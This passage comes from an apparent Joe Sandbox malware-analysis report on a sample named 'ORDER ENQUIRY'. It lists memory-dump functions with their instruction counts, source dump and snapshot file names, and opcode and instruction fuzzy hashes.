Function 01B3C460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
Instruction ID: 9ab870762a26b1b9bed6a0015779d704c8c1ca93c2e2fa82f8779758f161e5fc
Opcode Fuzzy Hash: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
Instruction Fuzzy Hash: 9E115B71A00209ABDF19EFA8C944EAE7BB5EB88340F00409AF901A7340DB35E921CB90

Function 01B3C97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
Instruction ID: 8b7f8cc84623179d2382d77a53bd6ac88dbf9c2b3ea75ecf6926b3efad7c34e8
Opcode Fuzzy Hash: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
Instruction Fuzzy Hash: 1D115A716043049FC700DF69C54195BBBE4EF98610F00855EBA98D7350D730E900CB92

Function 01B84A80 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction ID: e054c0a4c7f0f68ea82bc2330bf85612fae34e8f6808b29ed749df15fd4be41d
Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction Fuzzy Hash: 1001D8362006029FDB29AB69D844F96FBE6FFC5B10F044859E6428F650DB70F840C754

Function 01B3CA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
Instruction ID: 8052e4026bc7e94a22fbd231d045861597a1116ad83f6647eec4635eb25531b9
Opcode Fuzzy Hash: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
Instruction Fuzzy Hash: 2E1157B16083089FC700DFA9C541A5BBBE4EF99750F00895EBA58D73A4E630E901CB92

Function 01ACE016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: ae2064a5e461c082fbb5e5000f47ad5058c47ae2aecfd23a1536ade11c0063bb
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 72017C322406809FE32B971DC988F267FE8EF44B64F0D44A5F909CB6E2DB68DC40C661

Function 01AA826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
Instruction ID: 5d87698b5b7d43e3e5a54bda64add9d0c5289abcef7703ac860def5b8b214ef4
Opcode Fuzzy Hash: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
Instruction Fuzzy Hash: 6D01F771B00505EBCB18EBA9DD44ABFBBF8FF84210B854069D901A7280DF30DC05C290

Function 01B5EB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
Instruction ID: 435565ec1ce870b010a73187ede361f8ccac714bdcfc5ed784b80467598e6492
Opcode Fuzzy Hash: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
Instruction Fuzzy Hash: B601DFB1684602AFD3395B19D941F12FAA8EF54B90F00046EF60A8B3A0C7B0D8408B94

Function 01AB2582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
Instruction ID: 29d4b93ffa6b2eadd187ead78b661d397bdfca92e7d88b47b420fdfe2ab15b70
Opcode Fuzzy Hash: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
Instruction Fuzzy Hash: 4EF0F932741650B7C7319B568D80F577EAEEF84E90F04456AB60597641C634ED01CAA0

Function 01ADC073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: 4425d0a935547de773268d0a3f31089e16e2e3d7e80cf31dcbff4c6d93f4feab
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: 19F0C2B2A00A11ABD324CF4DDD40E57FBEADBD1AA0F04812CF605C7220EA31ED04CB90

Function 01AAC310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: b5e55eddf89b10c4abe2530462d18b56c0c04d34ab6e6e0eb859fec4f71a895c
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 5DF0FC732046239FF732576D8940B6BE9A58FD5A74F590039E2059B248CB608D0157E0

Function 01B8634F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
Instruction ID: 6cc5609b8f7a3d7f4813944d86b19fd086532dca9a1592d00a95e2a715883223
Opcode Fuzzy Hash: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
Instruction Fuzzy Hash: F6014F71A10609EFDB04DFA9D591AAEB7F8FF58704F10406AFA14E7350D7749A01CBA4

Function 01B862D6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
Instruction ID: e57df565b5422ab541c559a5a779cd33485e2580cb4d119176b770ee680c80ff
Opcode Fuzzy Hash: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
Instruction Fuzzy Hash: 1D012171A0020AABDB04DFA9D541AAEB7F8EF58704F50805AFA14E7350D7749D01CBA4

Function 01B8625D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
Instruction ID: e1b8ea296d64ad2ba0be206c2633b38807dbdf8afd350bcb6eb48e6a9f1d2671
Opcode Fuzzy Hash: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
Instruction Fuzzy Hash: 7F017171A00209EBCB04DFA9D541AAEB7F8EF58700F10805AF900E7350D7749901CBA0

Function 01AECA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: ff7ce0ae48d295434f5a2f39e46b1acc943d0b663022ba408bfd9e72da1c86fb
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 2901F4322006959BD727A71DD809F99BBD9EF51764F0D84A5FA188B6A2D779C800C250

Function 01B861E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
Instruction ID: b75ed1a9a4fcdbe7a2cdd3beb165407f961701c94c2990cd7ec2a3285b5f80f0
Opcode Fuzzy Hash: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
Instruction Fuzzy Hash: D0014F71A002499BDB04DFA9D545AEEBBF8FF58710F14409AF501E7290D774EA01CB94

Function 01B363C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: fc8ec70ed4527978fb2e24cd167baebbf654681f834adc52c56b6ccd024ac06a
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: F1F0F97220001DBFEF019F94DE81DAF7B7EEB99698B104165BA11A2160D631DE21ABA0

Function 01B3A4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
Instruction ID: 38fd4a71abe97810230fcb42041f515fd608754ae1e61bb439c2795cc7daa661
Opcode Fuzzy Hash: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
Instruction Fuzzy Hash: D6019A36100209ABCF129F94DC40EDE3F66FB4C754F068141FE19A6260C332E970EB81

Function 01AAC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
Instruction ID: 2a4a6d097bcd15642b428ad58ac429ece5cd26b4dc4bc17f2846d45058895d15
Opcode Fuzzy Hash: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
Instruction Fuzzy Hash: B8F024713043415BF758A7699C01B2236AAE7C0760FA9806AEB098F6C5FB70EC0183A4

Function 01AE656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
Instruction ID: b1b4d82442dc111e697f802f1f72549cd0661442d0fb8c4e89c67e933b8532f4
Opcode Fuzzy Hash: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
Instruction Fuzzy Hash: EB01A4703006819BE737977CCD4CF653BE4FF50B00F4949A4FA498BAD6D728D8018620

Function 01B5437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: ca13e1490ca86c7d828e4094b0b41e5341e8f350906be47d008058b38f53a640
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 9AF02E31741D1347EBBDAB2E8554B2FA696DF90D40B0505BC9D01CB661FF20DC80C790

Function 01B3C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
Instruction ID: d786fdaef61af0ee487ced8df243d343aa3c9a9cbd6d27174873029ef63571a1
Opcode Fuzzy Hash: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
Instruction Fuzzy Hash: CBF0AF716053049FC714EF68C542A2BBBE4FF98710F408A5EB998DB390E734EA01C796

Function 01B3E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: 2a17cac4db121086e1114bce96f12295545dbd35495dfeb550768074bd640ae8
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: C3F08933F155129BD7359A4DCC80F56B768EFD5A60F1901AAAA04AB260C760FC11C7D0

Function 01AE0854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 74ee4ee5d8c36a1d169f5c13fc737b5611a0b0cc6cfb9daeb7a3a518b0e4f834
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: F0F0BE72710205AFE725DB25CE05F96B6F9EFA8740F148478E949D72A0FAB0EE01C694

Function 01B3C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
Instruction ID: 097cb3df08b7ba51ed733466678be37f31ba9c99fa3dbcd9911826b156b830ce
Opcode Fuzzy Hash: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
Instruction Fuzzy Hash: BBF06270A01249DFCB04EFA9C655AAEBBF4FF58300F00815AB955EB385DA34EE01CB54

Function 01AB47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
Instruction ID: 90352160b5b5464e19f750485883f82f929fea790cdb03ba893afdea01f5285c
Opcode Fuzzy Hash: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
Instruction Fuzzy Hash: 76F0B4319166E19FE733DBECC5C4BA17BECEB08A30F08496AE58B87543C724D880C691

Function 01B70115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
Instruction ID: 880463b52ff77a02bf1fe0c70d480aa3d37b0d5583caefc075886aa728b65b3d
Opcode Fuzzy Hash: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
Instruction Fuzzy Hash: CAF05CAB4196C00ACF3A7B3C74613D16F58E767210F4D20CAF5B157605C7788483C320

Function 01AEC5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
Instruction ID: 31c2ed3ed1f41a0762788d3554dadf1cba1ae5027cfd39471724e31053b488e1
Opcode Fuzzy Hash: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
Instruction Fuzzy Hash: 51F0E2715156919FE722971CC14CB23BBE49B81BB1F08B465D40A87556C364E880CE50

Function 01AF2619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 0d8bdd64d85ae9d0966481ae6bc62ee28c29eaef477f442586840ae2cc8b666c
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: FFE0D8723006016BE7119F998DC0F477B6EDFD6B10F04007EB6045F251CAE2DC0986A4

Function 01B46030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 158e084d13c291ce42b7bf75b128ab06cfe09dce7679fc5d4c825a9dc4422610
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 5DF06572204204DFE3298F09D984F52B7F8EB1A765F45C069E6099B661D379EC40DFA4

Function 01AB0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 42e9d39f0dda097c1fb76e5aae1722c34383243fdfd79a9ae2f2bf6a27d1e755
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 9CF0E539204B819BDB1ACF19C190AD6BBF8FB51350F0444D4F8468B352D731E9C2CB50

Function 01AE49D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: d476f3aa9ce4420087ec6d112fdcc9c9d87e4470872beac6c5fd305746011f09
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 35E0D832744145AFD3211A598818B667FEEDBD87F0F150429E200CB150DB70DC40C7D8

Function 01B84164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
Instruction ID: c2371d8c0c0b3db3ba612af5e251bb35667c0eda1603c21a2478307c1ef289ab
Opcode Fuzzy Hash: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
Instruction Fuzzy Hash: 29F06D31A2AA938FE77AF72DE684B567FE4EF10E30F9A05E4D44587952C724EC80C650

Function 01B5678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 0a495ff303b1fc8c0540f298fa19f6639044a7d07ccc4d012e4bc8a8e28072ac
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: D0E0DF72A00110FBEB219799CE05F9ABFACDB94FA0F050194FA00E7090E630EE00C690

Function 01B808C0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: 0a078d4340c0ca874b7809725ff4e13b67a405ac449abc29eca4afcfb4681f2e
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: D6E09B316513508BCB29BA1DC540A53B7E8DF95AA1F1580E9E90547612C331F887C6D0

Function 01AB25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
Instruction ID: eae1dbd99fd5c8a5505bc5c932aa2e541ac1bbb068460eb6cb4dfee25c425f41
Opcode Fuzzy Hash: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
Instruction Fuzzy Hash: 4EE092721005949BC721BF29DE41FDA7B9AEF64760F01451AF11657191CB30B810C784

Function 01B6A456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: 78876262e0ffc645c82eeb305209d41723505c4554ccb75046ba27258aa376dc
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: 4DE01231010A52DFEB366F3ADE48B56BAE5FF60B11F148C6DE196264B0C779D8C1CA40

Function 01B34000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 6df7d93a54769f6f74a6394dc340b70d286e239823c61c287276bfb97cc27ab4
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
